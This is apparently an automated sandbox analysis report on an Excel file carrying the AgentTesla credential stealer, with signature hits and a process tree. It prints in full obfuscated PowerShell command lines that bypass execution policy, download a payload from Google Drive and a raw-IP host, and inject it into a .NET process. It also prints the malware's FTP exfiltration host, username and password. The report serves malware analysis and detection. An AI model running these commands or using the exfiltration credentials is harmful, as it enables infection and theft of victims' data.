Edit tour
Windows
Analysis Report
transferencia interbancaria_66579.xlam.xlsx
Overview
General Information
| Sample name: | transferencia interbancaria_66579.xlam.xlsx |
| Analysis ID: | 1540840 |
| MD5: | c2a1f2f11eafc8f0faa2480b44d95d7d |
| SHA1: | 4aacb955102f10f5c66089fd097f22a633360383 |
| SHA256: | bf04af05000e8205dad105999af809b1031eeb438aff45e36ae9ab416d669002 |
| Tags: | xlamxlsxuser-abuse_ch |
| Infos: |   |
 | |
Detection
AgentTesla
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w7x64
EXCEL.EXE (PID: 3496 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) 
EQNEDT32.EXE (PID: 3700 cmdline: "C:\Progra m Files\Co mmon Files \Microsoft Shared\EQ UATION\EQN EDT32.EXE" -Embeddin g MD5: A87236E214F6D42A65F5DEDAC816AEC8) 
wscript.exe (PID: 3840 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\night datinglove rxxx.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A) 
powershell.exe (PID: 3884 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCdrRnZpbW FnZVVybCcr JyA9ICcrJ2 d3MGh0dHBz Oi8vZHJpdm UuZ29vZ2xl LicrJ2NvJy snbS91Yz9l eHAnKydvcn Q9ZG93bmxv YWQmaWQ9MU FJVmdKSkp2 MUY2dlM0c1 VPeWJuSC1z RCcrJ3ZVaE JZd3VyIGd3 MDtrRnYnKy d3ZWJDbGll bnQgPSBOZX ctT2JqZWN0 IFN5c3RlbS 5OZXQuV2Vi Q2wnKydpZW 50O2tGJysn dmltYScrJ2 dlQnl0ZXMg PSAnKydrRn Z3ZWJDbGll bnQuJysnRG 93bmxvYWRE YXRhKGtGdm ltYWdlVXJs KTtrRnZpbW FnZVRleHQg PSBbU3lzdG VtLlRleHQu RScrJ25jb2 RpbmddOjpV VEY4LkdldF N0cmluJysn ZyhrRnZpbW FnZUJ5dGVz KTtrRnZzdG FydEZsYWcg PSBndzA8PE JBU0U2NF9T VEFSVD4+Z3 cwO2tGdmVu ZCcrJ0ZsYW cgPSBndzA8 PEJBJysnU0 U2NF9FTkQ+ Pmd3MDtrRn ZzdGFydElu ZGUnKyd4ID 0ga0Z2aW1h Z2VUZXh0Lk luZGV4T2Yo a0Z2c3Rhcn RGbGFnKTtr RicrJ3Zlbm RJbmRleCA9 IGtGdmltYW dlVGV4dC5J JysnbmRleE 9mKGtGdmVu ZEZsJysnYW cpO2tGdnN0 YXJ0SW5kZX ggLWdlIDAg LScrJ2EnKy duZCBrRnZl bmRJbmRleC AnKyctZ3Qg a0Z2c3Rhcn RJbmRleDtr RnZzdGFydE luZGV4ICs9 IGtGdnN0YX J0RmxhZy5M ZW5ndGg7a0 Z2YmFzZTY0 TGVuZ3RoID 0ga0Z2ZW5k SW5kZXggLS BrRnZzdGFy dEluZGV4O2 tGdmJhc2U2 NENvbW1hbm QgPSBrRnZp bWFnZVRleH QuU3Vic3Ry aW5nKGtGdn N0YXJ0SW5k JysnZXgsIG tGdmJhc2U2 NExlbmd0aC k7a0Z2YmFz ZTY0UmV2ZX JzZWQgPSAt am9pbiAoa0 Z2YmFzZTY0 Q29tbWFuZC 5Ub0NoYXJB cnJheSgpJy snIHc1Jysn YyBGb3JFYW NoLU9iamVj dCB7IGtGdl 8gfSlbLTEu Li0oa0Z2Ym FzZTY0Q29t bWFuZC5MZW 5ndGgpXTtr RnZjb21tYW 5kQnl0ZXMg PSBbU3lzdG VtLkNvbnZl cnRdOjpGcm 9tJysnQmFz ZTY0U3RyaW 5nKGtGdmJh c2U2NFJldm Vyc2UnKydk KTtrRnZsb2 FkZWRBc3Nl bWJseSA9IF tTeXN0ZScr J20uUmVmbG VjdGlvbi5B c3NlbWJseV 06OkxvYWQo a0Z2Y29tbW FuZEJ5dGVz KTtrRnZ2YW lNZXRob2Qg PSBbZG5saW IuSU8uSG9t ZV0uR2V0TW V0aG9kKGd3 MFZBSWd3MC k7a0Z2dmFp TWV0aG9kLk ludm9rZShr RnYnKydudW xsLCBAKGd3 MHR4dC5hYW FhYWJld21h ZGFtLzMxLj EnKyczLjI3 MS43MCcrJz EvLzpwdHRo JysnZ3cwLC BndzBkZScr J3NhdGl2YW RvZ3cwLCBn dzBkZScrJ3 NhdGl2YWRv Z3cwLCBndz BkZXNhdGl2 YWRvZ3cwLC BndzBBZGRJ blByb2Nlc3 MzMmd3MCwg Z3cwZGVzYX RpdmFkb2d3 MCwgZ3cwZG VzYXRpdmFk b2d3MCxndz BkZXNhdGl2 YWRvJysnZ3 cwLGd3MGRl c2F0aXZhJy snZG9ndzAs Z3cwZGVzYX RpdmFkb2d3 MCxndzBkZX NhdGl2YWRv Z3cwLGd3MG Rlc2F0aXZh ZG9ndzAsZ3 cwMWd3MCxn dzBkZXNhdG l2YWRvZ3cw KScrJyk7Jy kuUmVQbGFD ZSgndzVjJy xbU3RySW5H XVtDaEFSXT EyNCkuUmVQ bGFDZSgna0 Z2JywnJCcp LlJlUGxhQ2 UoKFtDaEFS XTEwMytbQ2 hBUl0xMTkr W0NoQVJdND gpLFtTdHJJ bkddW0NoQV JdMzkpIHwg JiAoKHZhck lBQkxFICcq TWRyKicpLk 5hbWVbMywx MSwyXS1KT2 luJycp';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8) - powershell.exe (PID: 3984 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "('kFv imageUrl'+ ' = '+'gw0 https://dr ive.google .'+'co'+'m /uc?exp'+' ort=downlo ad&id=1AIV gJJJv1F6vS 4sUOybnH-s D'+'vUhBYw ur gw0;kFv '+'webClie nt = New-O bject Syst em.Net.Web Cl'+'ient; kF'+'vima' +'geBytes = '+'kFvwe bClient.'+ 'DownloadD ata(kFvima geUrl);kFv imageText = [System. Text.E'+'n coding]::U TF8.GetStr in'+'g(kFv imageBytes );kFvstart Flag = gw0 <<BASE64_S TART>>gw0; kFvend'+'F lag = gw0< <BA'+'SE64 _END>>gw0; kFvstartIn de'+'x = k FvimageTex t.IndexOf( kFvstartFl ag);kF'+'v endIndex = kFvimageT ext.I'+'nd exOf(kFven dFl'+'ag); kFvstartIn dex -ge 0 -'+'a'+'nd kFvendInd ex '+'-gt kFvstartIn dex;kFvsta rtIndex += kFvstartF lag.Length ;kFvbase64 Length = k FvendIndex - kFvstar tIndex;kFv base64Comm and = kFvi mageText.S ubstring(k FvstartInd '+'ex, kFv base64Leng th);kFvbas e64Reverse d = -join (kFvbase64 Command.To CharArray( )'+' w5'+' c ForEach- Object { k Fv_ })[-1. .-(kFvbase 64Command. Length)];k FvcommandB ytes = [Sy stem.Conve rt]::From' +'Base64St ring(kFvba se64Revers e'+'d);kFv loadedAsse mbly = [Sy ste'+'m.Re flection.A ssembly]:: Load(kFvco mmandBytes );kFvvaiMe thod = [dn lib.IO.Hom e].GetMeth od(gw0VAIg w0);kFvvai Method.Inv oke(kFv'+' null, @(gw 0txt.aaaaa bewmadam/3 1.1'+'3.27 1.70'+'1// :ptth'+'gw 0, gw0de'+ 'sativadog w0, gw0de' +'sativado gw0, gw0de sativadogw 0, gw0AddI nProcess32 gw0, gw0de sativadogw 0, gw0desa tivadogw0, gw0desativ ado'+'gw0, gw0desativ a'+'dogw0, gw0desativ adogw0,gw0 desativado gw0,gw0des ativadogw0 ,gw01gw0,g w0desativa dogw0)'+') ;').RePlaC e('w5c',[S trInG][ChA R]124).ReP laCe('kFv' ,'$').RePl aCe(([ChAR ]103+[ChAR ]119+[ChAR ]48),[StrI nG][ChAR]3 9) | & ((v arIABLE '* Mdr*').Nam e[3,11,2]- JOin'')" MD5: EB32C070E658937AA9FA9F3AE629B2B8) 
AddInProcess32.exe (PID: 3136 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Add InProcess3 2.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
{"Exfil Mode": "FTP", "Host": "ftp://ftp.fosna.net", "Username": "madamweb@fosna.net", "Password": "=A+N^@~c]~#I"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_XML_LegacyDrawing_AutoLoad_Document | detects AutoLoad documents using LegacyDrawing | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| Click to see the 8 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
| INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
| |
| MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen |
| |
| Click to see the 9 entries | ||||
Exploits |   |
|---|
| Source: | Author: Joe Security: | ||
| Source: | Author: Joe Security: | ||
System Summary | |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||